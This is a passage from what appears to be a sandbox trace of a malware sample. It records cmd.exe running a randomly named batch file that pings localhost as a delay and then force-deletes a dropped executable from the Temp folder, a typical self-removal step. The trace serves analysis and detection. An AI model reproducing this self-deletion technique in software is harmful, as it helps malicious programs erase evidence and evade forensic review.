lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.850] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2af030 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0115.850] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x2af030 | out: _Buffer=">") returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] GetFileType (hFile=0x7) returned 0x2 [0115.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff8 | out: lpMode=0x2aeff8) returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x2af024, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x2af024*=0x19) returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] GetFileType (hFile=0x7) returned 0x2 [0115.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af27c | out: lpMode=0x2af27c) returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x420958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x2af2a8, lpReserved=0x0 | out: lpBuffer=0x420958*, lpNumberOfCharsWritten=0x2af2a8*=0x4) returned 1 [0115.851] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2af2b4 | out: _Buffer=" -n 3 localhost ") returned 16 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] GetFileType (hFile=0x7) returned 0x2 [0115.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af274 | out: lpMode=0x2af274) returned 1 [0115.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x2af2a0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2a0*=0x10) returned 1 [0115.852] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af2d4 | out: _Buffer="\r\n") returned 2 [0115.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] GetFileType (hFile=0x7) returned 0x2 [0115.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af294 | out: lpMode=0x2af294) returned 1 [0115.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af2c0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2c0*=0x2) returned 1 [0115.852] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0115.852] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0115.852] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0115.852] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0115.852] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0115.853] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0115.853] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0115.853] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0115.853] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0115.853] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0115.853] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 
[0115.853] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0115.853] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0115.853] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0115.853] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0115.853] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0115.853] _wcsicmp (_String1="ping", _String2="START") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0115.853] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0115.853] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0115.853] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0115.853] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0115.853] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0115.853] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0115.853] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0115.853] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0115.854] SetErrorMode (uMode=0x0) returned 0x0 [0115.854] SetErrorMode (uMode=0x1) returned 0x0 [0115.854] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x430550, lpFilePart=0x2af078 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af078*="Desktop") returned 0x18 [0115.854] SetErrorMode (uMode=0x0) returned 0x1 [0115.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.854] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.854] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.854] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0xffffffff [0115.855] GetLastError () returned 0x2 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0xffffffff [0115.855] GetLastError () returned 0x2 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0x430838 [0115.855] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0xffffffff [0115.855] GetLastError () returned 0x2 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0x430838 [0115.855] FindClose (in: 
hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0115.855] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0115.855] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0115.855] GetConsoleTitleW (in: lpConsoleTitle=0x2aee44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.856] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.856] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.856] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0xffffffff [0115.856] GetLastError () returned 0x2 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0xffffffff [0115.856] GetLastError () returned 0x2 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0x430d80 [0115.856] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0xffffffff [0115.857] GetLastError () returned 0x2 [0115.857] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0x430d80 [0115.857] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0115.857] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0115.857] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0115.857] GetConsoleTitleW (in: lpConsoleTitle=0x2aebd8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.857] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aea60, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aeb28 | out: lpAttributeList=0x2aea60, lpSize=0x2aeb28) returned 1 [0115.857] UpdateProcThreadAttribute (in: lpAttributeList=0x2aea60, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aeb20, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aea60, lpPreviousValue=0x0) returned 1 [0115.857] GetStartupInfoW (in: lpStartupInfo=0x2aea1c | out: lpStartupInfo=0x2aea1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0115.857] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0115.858] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aeabc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aeb08 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x2aeb08*(hProcess=0x54, hThread=0x58, dwProcessId=0xe34, dwThreadId=0xe38)) returned 1 [0116.076] CloseHandle (hObject=0x58) returned 1 [0116.076] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.076] GetEnvironmentStringsW () returned 0x420970* [0116.076] FreeEnvironmentStringsW (penv=0x420970) returned 1 [0116.076] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0120.013] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ae9fc | out: lpExitCode=0x2ae9fc*=0x0) returned 1 [0120.013] CloseHandle (hObject=0x54) returned 1 [0120.013] _vsnwprintf (in: _Buffer=0x2aeb44, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aea08 | out: _Buffer="00000000") returned 8 [0120.013] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.013] GetEnvironmentStringsW () returned 0x422c28* [0120.014] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0120.014] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.014] GetEnvironmentStringsW () returned 0x422c28* [0120.014] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0120.014] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aea60 | out: lpAttributeList=0x2aea60) [0120.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.014] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.014] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.014] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.014] SetConsoleInputExeNameW () returned 0x1 [0120.014] GetConsoleOutputCP () returned 0x1b5 [0120.015] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.015] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.015] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.015] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.015] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.016] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.016] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.016] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x7c, lpOverlapped=0x0) returned 1 [0120.017] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.017] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n") returned 62 [0120.017] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.017] GetFileType (hFile=0x54) returned 0x1 [0120.017] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.017] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.019] _tell (_FileHandle=3) returned 83 [0120.019] _close (_FileHandle=3) returned 0 
[0120.019] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af034 | out: _Buffer="\r\n") returned 2 [0120.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.019] GetFileType (hFile=0x7) returned 0x2 [0120.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.020] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff4 | out: lpMode=0x2aeff4) returned 1 [0120.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.020] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af020, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af020*=0x2) returned 1 [0120.027] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.027] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.027] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2af030 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.027] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x2af030 | out: _Buffer=">") returned 1 [0120.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.027] GetFileType (hFile=0x7) returned 0x2 [0120.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff8 | out: lpMode=0x2aeff8) returned 1 [0120.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.028] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x2af024, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x2af024*=0x19) returned 1 [0120.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.028] GetFileType (hFile=0x7) returned 0x2 [0120.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.028] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x2af27c | out: lpMode=0x2af27c) returned 1 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2af2a8, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x2af2a8*=0x3) returned 1 [0120.029] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2af2b4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" ") returned 58 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.029] GetFileType (hFile=0x7) returned 0x2 [0120.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.029] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af274 | out: lpMode=0x2af274) returned 1 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x2af2a0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2a0*=0x3a) returned 1 [0120.029] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af2d4 | out: _Buffer="\r\n") returned 2 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.030] GetFileType (hFile=0x7) returned 0x2 [0120.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af294 | out: lpMode=0x2af294) returned 1 [0120.030] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.030] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af2c0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2c0*=0x2) returned 1 [0120.030] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.030] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.030] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.030] 
GetConsoleTitleW (in: lpConsoleTitle=0x2aee44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.031] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2adec0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.031] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.031] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x2020 [0120.031] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.031] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x2020 [0120.032] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0x410aa8 [0120.032] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 1 [0120.032] FindNextFileW (in: hFindFile=0x410aa8, lpFindFileData=0x430554 | out: lpFindFileData=0x430554) returned 0 [0120.033] GetLastError () 
returned 0x12 [0120.033] FindClose (in: hFindFile=0x410aa8 | out: hFindFile=0x410aa8) returned 1 [0120.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.033] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.034] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.034] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.034] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.034] SetConsoleInputExeNameW () returned 0x1 [0120.034] GetConsoleOutputCP () returned 0x1b5 [0120.034] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.034] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.034] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.034] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.034] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.035] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.035] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x3e, lpOverlapped=0x0) returned 1 [0120.035] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, 
cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n") returned 62 [0120.035] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] GetFileType (hFile=0x54) returned 0x1 [0120.035] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.036] _tell (_FileHandle=3) returned 145 [0120.036] _close (_FileHandle=3) returned 0 [0120.037] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af034 | out: _Buffer="\r\n") returned 2 [0120.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.037] GetFileType (hFile=0x7) returned 0x2 [0120.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.037] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff4 | out: lpMode=0x2aeff4) returned 1 [0120.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af020, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af020*=0x2) returned 1 [0120.037] GetCurrentDirectoryW (in: nBufferLength=0x104, 